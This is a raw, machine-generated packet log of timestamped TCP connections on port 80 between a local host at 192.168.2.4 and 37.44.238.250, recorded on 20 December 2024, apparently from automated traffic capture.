                                                                                                                      Dec 20, 2024 21:18:43.925056934 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:43.967798948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044297934 CET804987237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044400930 CET4987280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.044608116 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.044702053 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.044912100 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.164412975 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.192023039 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.261377096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.311536074 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.311626911 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.316674948 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.394951105 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:44.514805079 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.514815092 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.514914036 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.962754011 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:44.963572979 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.083676100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.316812992 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.318016052 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.363801956 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.370719910 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.426172972 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.437163115 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.437180996 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.552259922 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.597942114 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.674843073 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.675700903 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.794871092 CET804987837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.796068907 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:45.796288967 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.796289921 CET4987880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.796358109 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:45.916204929 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.109808922 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.110872984 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.144993067 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.230436087 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264636993 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264647961 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.264664888 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.457535982 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.517581940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.566777945 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:46.578519106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:46.578632116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.066512108 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.113562107 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.244147062 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.244997025 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.300102949 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.347934008 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.364469051 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.423685074 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.424518108 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.543936968 CET804988437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.543998003 CET4988480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.544363976 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.544493914 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.544636965 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.598011971 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.651654959 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.664681911 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.691695929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:47.717544079 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.717675924 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:47.894881010 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.014542103 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.014552116 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.014559984 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.401667118 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.402759075 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.522500992 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.754288912 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.810122013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.815921068 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.863554001 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.863558054 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:48.873967886 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:48.874234915 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.048188925 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.097965956 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.174130917 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.174969912 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.294276953 CET804988937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.294384956 CET4988980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.295243025 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.295357943 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.295562029 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.415009975 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.600807905 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.601588011 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.645193100 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:49.721492052 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764755011 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764797926 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.764898062 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:49.957564116 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.010785103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.066739082 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.077265024 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.077294111 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.565597057 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.613569021 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.729455948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.730350018 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.804681063 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.847933054 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.849857092 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:50.923460007 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:50.924357891 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.043512106 CET804989337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.043586969 CET4989380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.044164896 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.044239998 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.044424057 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.082365990 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.140605927 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.165436983 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.191826105 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.203932047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.204097986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.395019054 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.516223907 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.516241074 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.516355991 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.855381966 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:51.856213093 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:51.976161003 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.207683086 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.263573885 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.316674948 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.325829983 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.327455044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.327591896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.379175901 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.561688900 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.613550901 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.691632986 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.692447901 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.814913988 CET804989737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.815027952 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.815092087 CET4989780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.815213919 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.815419912 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:52.936332941 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.983566046 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:52.984396935 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:53.104309082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.160545111 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:53.282239914 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.282273054 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.282305956 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.332474947 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:53.391231060 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.441816092 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:53.452069998 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:53.452270985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.085952044 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.129215002 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.142708063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.145025969 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.264761925 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.324384928 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.379298925 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.457823992 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.458548069 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.504412889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.552005053 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.579143047 CET804990337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.579586983 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.579673052 CET4990380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.579721928 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.579925060 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.597943068 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:54.626152992 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.626297951 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.699434042 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:54.926150084 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:55.045907974 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.045945883 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.045979977 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.274697065 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.275549889 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:55.396444082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.629292011 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:55.693779945 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.738559008 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:55.749787092 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.749960899 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.849172115 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:55.894833088 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.084470987 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.129215002 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.132213116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.133445024 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.203639030 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.204474926 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.253212929 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.323697090 CET804991037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.324260950 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.324333906 CET4991080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.324358940 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.324529886 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.444086075 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.488682032 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.540699959 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.582315922 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.612720013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.612768888 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.676212072 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:56.795955896 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.796106100 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:56.796133995 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.261365891 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.263299942 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.382880926 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.596350908 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.613706112 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.644821882 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.694557905 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.734241962 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.734273911 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.738569021 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.832025051 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:57.879183054 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.955452919 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:57.956296921 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.076313972 CET804991537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.076335907 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.076442003 CET4991580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.076507092 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.076692104 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.198873043 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.426268101 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.432641983 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.439273119 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.545933962 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.545948982 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.545993090 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.560575008 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.785543919 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.847507000 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.894795895 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:58.906981945 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:58.907155037 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.348875999 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.394818068 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.562707901 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.563476086 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.584338903 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.629224062 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.683723927 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.722027063 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.723009109 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.842040062 CET804991937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.842113018 CET4991980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.842529058 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.842607021 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.842746973 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.910569906 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:18:59.962269068 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:18:59.977632046 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.019804955 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:00.030049086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.030189991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.191848040 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:00.357228994 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.357239008 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.357247114 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.473812103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.474682093 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:00.594099045 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.832746029 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:00.881077051 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.926063061 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:00.952383995 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:00.952492952 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.117680073 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.164741993 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.356400013 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.410448074 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.474020004 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.474956989 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.594511986 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.594588995 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.594738960 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.594764948 CET804992237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.594841957 CET4992280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.651535988 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.652292967 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:01.714798927 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.771903038 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:01.941922903 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:02.004266977 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:02.059591055 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.062355042 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.062369108 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.062517881 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.113548040 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:02.123771906 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.123891115 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.852031946 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.853140116 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:02.879728079 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:02.926212072 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:02.972773075 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.112612963 CET804992837.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.160435915 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.207420111 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.239759922 CET4992880192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.240817070 CET4993580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.259530067 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.301054955 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:19:03.327083111 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:19:03.327179909 CET804973237.44.238.250192.168.2.4
